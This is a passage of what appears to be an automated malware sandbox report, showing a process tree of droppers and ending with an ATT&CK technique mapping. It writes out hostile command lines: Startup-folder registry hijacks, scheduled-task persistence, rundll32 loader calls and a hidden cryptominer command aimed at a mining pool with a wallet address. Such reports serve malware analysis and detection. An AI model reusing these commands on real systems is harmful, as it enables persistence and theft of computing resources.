                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:8764
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffa015edec0,0x7ffa015eded0,0x7ffa015edee0
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:9000
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff68f979e70,0x7ff68f979e80,0x7ff68f979e90
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:5536
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1496 /prefetch:2
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:308
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --mojo-platform-channel-handle=1780 /prefetch:8
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:5920
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --mojo-platform-channel-handle=2076 /prefetch:8
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:9200
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2464 /prefetch:1
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:7764
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:1
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:4476
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --mojo-platform-channel-handle=2996 /prefetch:8
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:9088
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3092 /prefetch:2
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:7564
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --mojo-platform-channel-handle=436 /prefetch:8
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:308
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,6562916938398848321,712571475517834866,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8764_1678349308" --mojo-platform-channel-handle=2544 /prefetch:8
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4896
                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\_o4A2JAgfiU0Kc7szFRuYMhy.exe
                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\_o4A2JAgfiU0Kc7szFRuYMhy.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:5064
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7164
                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\2NcW8T6tXxpQDt9RA5gS92vM.exe
                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\2NcW8T6tXxpQDt9RA5gS92vM.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:5708
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\2NcW8T6tXxpQDt9RA5gS92vM.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\2NcW8T6tXxpQDt9RA5gS92vM.exe"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4024
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\O7GzTcqRy6kO205pg8v6aspx.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\O7GzTcqRy6kO205pg8v6aspx.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5132
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Ys8n1paddPYq7Ps_XZKaqO6y.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Ys8n1paddPYq7Ps_XZKaqO6y.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:6192
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3266992.scr
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3266992.scr" /S
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5480
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2743872.scr
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2743872.scr" /S
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:6616
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1715093.scr
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1715093.scr" /S
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:2172
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7961631.scr
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7961631.scr" /S
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                          PID:7064
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6347948.scr
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6347948.scr" /S
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:7044
                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\txnATSirhoMfOAVqDuADOpms.exe
                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\txnATSirhoMfOAVqDuADOpms.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:6396
                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\RT3wUCkjWPVTNNeMhpVY6Vwn.exe
                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\RT3wUCkjWPVTNNeMhpVY6Vwn.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:6560
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCEC93794\Mon209b3da1556b9a317.exe
                                                                                                                                                                                        Mon209b3da1556b9a317.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3280
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:944
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3128
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3440
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6444329.scr
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6444329.scr" /S
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:4632
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3618836.scr
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3618836.scr" /S
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:5016
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5407667.scr
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5407667.scr" /S
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:492
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8043496.scr
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8043496.scr" /S
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                PID:4296
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2137047.scr
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2137047.scr" /S
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:3284
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:4016
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4588
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:1512
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:7040
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:3756
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:4372
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:3892
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-L1MBS.tmp\setup.tmp
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-L1MBS.tmp\setup.tmp" /SL5="$10202,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:4168
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:4996
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-FDSBR.tmp\setup.tmp
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-FDSBR.tmp\setup.tmp" /SL5="$301F0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                          PID:5040
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-IUTCR.tmp\postback.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-IUTCR.tmp\postback.exe" ss1
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:4696
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:3424
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1476
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:5528
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:2720
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5680
                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:4928
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                        PID:2288
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:6948
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:7144
                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:3012
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:8232
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          PID:5628
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5656
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            PID:3860
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:3620
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                            PID:8360
                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                            PID:7976
                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            PID:9120
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 64CC28ACC7CDDA11CD1CC40736F388EC C
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6920
                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding E171DC3824A6A27F260E835651A41324 C
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:8276
                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 08375FFA20277A3455DB6149771D725E
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                  PID:3804
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:8136
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  PID:8340
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:9072

                                                                                                                                                                                                              Network

                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                              Execution

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1053

                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1031

                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                              1
                                                                                                                                                                                                              T1060

                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                              1
